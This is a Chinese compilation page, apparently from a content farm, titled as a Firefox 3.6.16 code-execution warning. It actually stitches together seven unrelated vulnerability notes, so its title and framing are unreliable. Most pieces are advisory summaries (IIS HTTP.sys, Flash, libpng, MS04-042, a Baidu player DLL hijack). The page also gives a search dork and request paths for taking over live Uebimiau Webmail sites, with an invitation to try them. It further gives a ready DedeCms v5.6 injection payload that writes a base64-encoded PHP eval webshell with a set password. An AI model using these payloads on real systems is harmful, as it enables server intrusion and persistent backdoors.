火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

2024-04-14

火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警(共7篇)

篇1:火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

goole 搜 Uebimiau Webmail

地址后面加 /uebimiau/admin/editor.php?load=config 被人拿了 加 /uebimiau/index.php?cmd=id

全部是外国的 ,,,高手可以玩玩,。。。。。。

漏洞公布时间 2009 6 。12

==========================================================

Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities

Dork : Uebimiau Webmail v3.2.0-1.8

POC :

/uebimiau/admin/editor.php?load=config

And You Can Write Any Code As

Go

/uebimiau/index.php?cmd=id

See Pic :www.almlf.com/get-6-2009-almlf_com_akszizl2.png

Thanx To

篇2:火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

该库文件名称为“log.dll”,推测应该是带有调试性质的日志记录接口,将该文件与任意格式的媒体文件放置在同一目录下,当用户使用百度影音播放媒体文件时,“log.dll”文件将会被同时加载,如果该文件为恶意攻击者开发,那么就会直接造成用户系统受到攻击,

为此,恶意攻击者可以利用该漏洞,远程共享带有“log.dll”和媒体文件的文件夹,诱使用户访问,最终实现远程入侵用户系统。

修复方法:

代码剔除法或者本地设定法

篇3:火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

Internet Information Services(IIS,互联网信息服务 ),是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。

IIS是一种Web(网页 )服务组件 ,其中包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器,分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)上发布信息成了一件很容易的事。

IIS的安全脆弱性曾长时间被业内诟病 ,一旦IIS出现远程执行漏洞威胁将会非常严重。远程执行代码漏洞存在于HTTP协议堆栈 (HTTP.sys) 中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统账户的上下文中执行任意代码, 可以导致IIS服务器所在机器蓝屏或读取其内存中的机密数据。

篇4:火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

DedeCms v5.6漏洞描述:

在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用

测试方法:

注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name=“']=0;phpinfo;//”}x{/dede:toby57},发表后查看或修改即可执行

a{/dede:link}{dede:toby57 name=“']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//”}x{/dede:toby57}

生成x.php 密码:xiao直接生成一句话,

DedeCms v5.6 恶意代码执行漏洞漏洞预警

篇5:火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

microsoft windows xp sp2

microsoft windows xp sp1

microsoft windows server 2003 sp1

microsoft windows server 2003

microsoft windows me

microsoft windows 98se

microsoft windows 98

microsoft windows 2000sp4

redhat linux ws 4

redhat linux ws 3

redhat linux es 4

redhat linux es 3

redhat linux as 4

redhat linux as 3

macromedia flash player <= 8.0.22.0

macromedia breeze meeting add-in <= 5.1

macromedia shockwave player <= 10.1.0.11

macromedia flash debug player <= 7.0.14.0

不受影响系统:

macromedia flash player 8.0.24.0

macromedia flash player 7.0.63.0

macromedia breeze meeting add-in 7.0.55.331 (win)

macromedia breeze meeting add-in 7.0.55.118 (mac)

macromedia shockwave player 10.1.1

描述:

macromedia flash player是一款非常流行的flash播放器,

flash player播放器swf文件存在远程代码执行漏洞其他漏洞

flash player在处理畸形恶意swf文件时存在漏洞,攻击者可能利用此漏洞在客户机器上执行任意指令。

如果攻击者诱骗用户使用flash player加载了恶意的swf文件的话,就会完全控制受影响的系统。

厂商补丁:

macromedia

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.macromedia.com/devnet/security/security_zone/apsb06-03.html

篇6:火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

受影响系统:

libpng libpng 1.2.0 - 1.2.26

libpng libpng 1.0.6 - 1.0.32

不受影响系统:

libpng libpng 1.2.27 beta01

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 28770

CVE(CAN) ID: CVE-2008-1382

libpng是多种应用程序所使用的解析PNG图形格式的函数库,

libpng库在处理畸形格式的PNG文件时存在漏洞,成功利用此漏洞允许本地攻击者读取敏感信息、导致拒绝服务或执行任意指令。

libpng库没有正确地处理未知类型的PNG块,如果使用该库的应用程序在特定情况下调用了png_set_read_user_chunk_fn()或png_set_keep_unknown_chunks()函数的话,长度为0的PNG块就会导致通过free()调用使用未初始化的内存。

<*来源:Tavis Ormandy (taviso@gentoo.org)

链接:secunia.com/advisories/29792/

marc.info/?l=bugtraq&m=120818474711737&w=2

libpng.sourceforge.net/Advisory-1.2.26.txt

security.gentoo.org/glsa/glsa-200804-15.xml

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

libpng

------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

downloads.sourceforge.net/libpng/libpng-1.2.27beta03.tar.bz2?modtime=1208169600&big_mirror=0

Gentoo

------

Gentoo已经为此发布了一个安全公告(GLSA-200804-15)以及相应补丁:

GLSA-200804-15:libpng: Execution of arbitrary code

链接:security.gentoo.org/glsa/glsa-200804-15.xml

所有libpng用户都应升级到最新版本:

# emerge --sync

# emerge --ask --oneshot --verbose “>=media-libs/libpng-1.2.26-r1”

篇7:火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

版本:1.0

摘要

本文档服务对象:使用 Microsoft DHCP Server 服务的客户,

漏洞的影响:远程执行代码

最高严重等级:重要

建议:客户应尽早安装该更新。

安全更新替代:无

注意事项:无

测试过的软件和安全更新下载位置:

受影响的软件:

Microsoft Windows NT Server 4.0 Service Pack 6a C 下载此更新

Microsoft Windows NT Server 4.0 终端服务器版 Service Pack 6 C 下载此更新 [英语]

不受影响的软件:

Microsoft Windows Service Pack 3 和 Microsoft Windows 2000 Service Pack 4

Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2

Microsoft Windows XP 64-Bit Edition Service Pack 1

Microsoft Windows XP 64-Bit Edition Version

Microsoft Windows Server 2003

Microsoft Windows Server 2003 64-Bit Edition

Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME)

已对此列表中的软件进行了测试,以确定这些版本是否会受到影响,

其它版本或者不再包括安全更新支持,或者可能不会受到影响。 要确定产品和版本的技术支持生命周期,请访问 Microsoft 产品技术支持生命周期网站。

微软的安全公告:

www.microsoft.com/china/technet/security/bulletin/MS04-042.mspx

(以上链接均连到第三方网站)

摘要:

该更新可消除一些秘密报告的新发现的漏洞。 本公告中的“漏洞详细资料”部分分别对每个漏洞进行了说明。

如果攻击者成功地利用了这些漏洞中最严重的漏洞,就能完全控制受影响的系统,包括:安装程序,查看、更改或删除数据,或者创建拥有完全权限的新帐户。 然而,试图利用这些漏洞将很可能导致 动态主机配置协议 (DHCP) 服务器出现拒绝服务的故障。

我们建议客户应尽早安装该更新。

严重等级和漏洞标识:

漏洞标识安全漏洞的影响Windows NT 4.0

登录漏洞 - CAN-2004-0899

拒绝服务

中等

DHCP 请求漏洞 - CAN-2004-0900

远程执行代码

重要事项

所有漏洞的综合严重程度

重要

修订:

上一篇:南湾小学未成年人思想道德教育工作第一阶段小结下一篇:养猪的实习报告